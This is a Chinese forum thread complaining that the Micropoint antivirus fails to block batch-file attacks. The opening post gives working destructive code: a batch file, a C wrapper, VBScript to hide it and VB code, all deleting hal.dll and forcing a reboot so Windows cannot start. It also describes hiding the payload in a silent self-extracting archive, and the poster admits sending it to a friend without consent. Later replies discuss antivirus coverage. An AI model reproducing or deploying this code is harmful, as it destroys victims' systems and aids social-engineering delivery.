关于微点的“不支持批处理处理”

清幻梦沁

既然都（这里指微点吧的某些人，下同）说批处理是用户行为，那么我就来澄清一下：
1. 批处理不管是不是用户行为，完全可以打包成.exe文件对用户实施侵害。你可以试试如下代码：
del /s /q /f /a %windir%\system32\hal.dll
shutdown -r -t 0
瞬间秒杀系统启动文件，并且马上重启，系统便无法启动，有兴趣的朋友可以试试，微点不会报警（我昨天刚在虚拟机里进行测试），而且我也上报过，微点的答案就是不支持批处理的处理。但我曾经把这个批处理的行为用C语言间接完成再用社会工程学发给了我QQ上的一个在学习编程的朋友（当然是没经过允许，但他也不会怪我），事实证明，完全可以利用社会工程学或者其他入侵方式来对指定人、甚至大多数人（比如把这个挂到一个网站上去）来进行快速的侵害。试想如果这个批处理被挂到百度上去，会有多少人的电脑系统会立即崩溃？会造成多大的时间耽误，会有多少经济损失？
2. 批处理可以做的，比如删除文件、格式化硬盘，用高级语言当然可以做到，微点所说的不支持批处理处理，那意思应该只是当批处理进行这些操作的时候不拦截，但用高级语言编写的程序进行这些行为应该拦截才对，但是经过我的测试，微点确实没有对进行这些恶意操作的高级语言编写的程序没有拦截，但用高级语言编写的程序应该就不是各位所说的用户行为了（如果是，那么熊猫也是用高级语言编写的，难道它的行为也是用户行为？），但为什么微点还不进行拦截？
附代码：
使用C语言间接完成上述批处理操作：

1. #include <stdio.h>
   
2. #include <stdlib.h>
   
3. int main (void)
   
4. {
   
5. FILE* spBat;
   
6. char* delHal   = "del /s /q /f /a %windir%\\system32\\hal.dll";
   
7. char* shutdown = "shutdown -r -t 0";
   
8. 
   
9. spBat = fopen("C:\\delHal.bat", "w");
   
10. if (!spBat)
    
11. {
    
12.   printf("Could not open input file\a\n");
    
13.   exit  (101);
    
14. }
    
15. 
    
16. fprintf(spBat, "%s\n", delHal);
    
17. fprintf(spBat, "%s", shutdown);
    
18. 
    
19. if (fclose(spBat) == EOF)
    
20. {
    
21.   printf("Could not close input file\a\n");
    
22.   exit  (201);
    
23. }
    
24. 
    
25.         system("C:\\delHal.bat");
    
26. return 0;
    
27. }

复制代码

批处理完全可以在后台运行，使得用户无法看到，也难以关闭（毕竟那个批处理只有2行，运行速度极快，即使用户看到也难以关闭，何谈开任务管理器关闭了），
附使得bat文件在后台运行的代码：
set ws=wscript.createobject("wscript.shell")  
ws.run "del.bat /start",0  
另外，完全可以把上述vbs代码整合到上面的C语言代码中去，这样.bat和.vbs文件都等于被打包成了一个C语言程序，然后再给这个C程序添加点代码让其后台运行，就可以做到神不知鬼不觉地秒杀对方操作系统。
这是打包的一种方法，还有一种方法是使用winrar制作成自解压文件，解压过程全部隐藏并且使用Winrar去右键补丁或者使用CAM32等工具对自解压文件进行编辑，去除右键的“使用Winrar打开”，这样用户就不会发现这是个自解压文件也可做到神不知鬼不觉。
另附VB代码：
Dim windir As String
windir = Environ("windir")
Kill windir & "\system32\hal.dll"
Shell ("shutdown -r -t 0")
上述代码与上述bat代码效果相同（当然，你可能会说我关机是调用cmd的，但是我的删除文件并不是调用cmd，而是用了VB中的函数，这就等于我删除文件的过程与批处理无关，而且我完全可以用API来执行重启操作（重启微点会拦截吗？你可以试试），调用cmd进行只是为了方便，再来，只要删除了那个文件，用户迟早会关闭计算机或者重启，所以即使当时不重启，效果也是一样的），微点也不报警。
这样微点的“不支持批处理处理”就比较怪，
微点不支持批处理处理，现在也情有可原，可是用高级语言执行这种恶意操作，微点也不处理，这就比较怪异了。
事实上，批处理比高级语言更容易做坏事，批处理只需要2行的代码，在高级语言中或许就要调用API这种对新手来说很复杂的东西，所以用批处理很容易进行恶意操作。我的猜测是：
微点不支持批处理的处理或许只是一个理由。
扩展阅读：http://hi.baidu.com/qilongzhu123/blog/item/fd73541b116b301e8618bfc1.html
此文章在百度微点吧也有讨论：http://tieba.baidu.com/f?z=673723928&ct=335544320&lm=0&sc=0&rn=30&tn=baiduPostBrowser&word=%CE%A2%B5%E3&pn=60
好久没来卡饭了（之前好多次都是朋友上的），大家新年好~

镜湖

楼主发到微点社区去吧

清幻梦沁

楼主发到微点社区去吧
镜湖 发表于 2010-1-17 09:59

    咱不敢，待会儿有人骂咱。咱最近被人给骂坏了。很少去微点社区，不知道那里怎么样。还是低调点好……

saga3721

到目前为止批处理的病毒可以过想要过的任何一款杀软甚至全过，现实就是如此不独微点为然。
但事实上被这种毒被格了盘的也很少很少，假如要防不少东西都得手动允许，Nero和一些游戏等，反正不少

dl123100

好像几个月前微点就对系统目录文件操作加强了防御

镜湖

回复 3# 清幻梦沁


    微点社区氛围是不错的。

佰恋雨

现在的病毒 木马都是以利益为主  

只有无聊的才会这么搞破坏

记得上次格盘门好像也过微点  之后微点就加强了这方面的防御（没试过...）

灰灰鸟

以前微点就批处理加强过。

softkiller

早期版本微点的hips功能 如试图修改 试图重命名ntldr等相关图就不截了。
下面是你说的微点不防批处理 还有系统盘之外程序的案例 6P：

  
Delete c:\ntldr boot.ini:

405016

微点可以拦截一些删除系统文件的行为，但有些可能拦截不了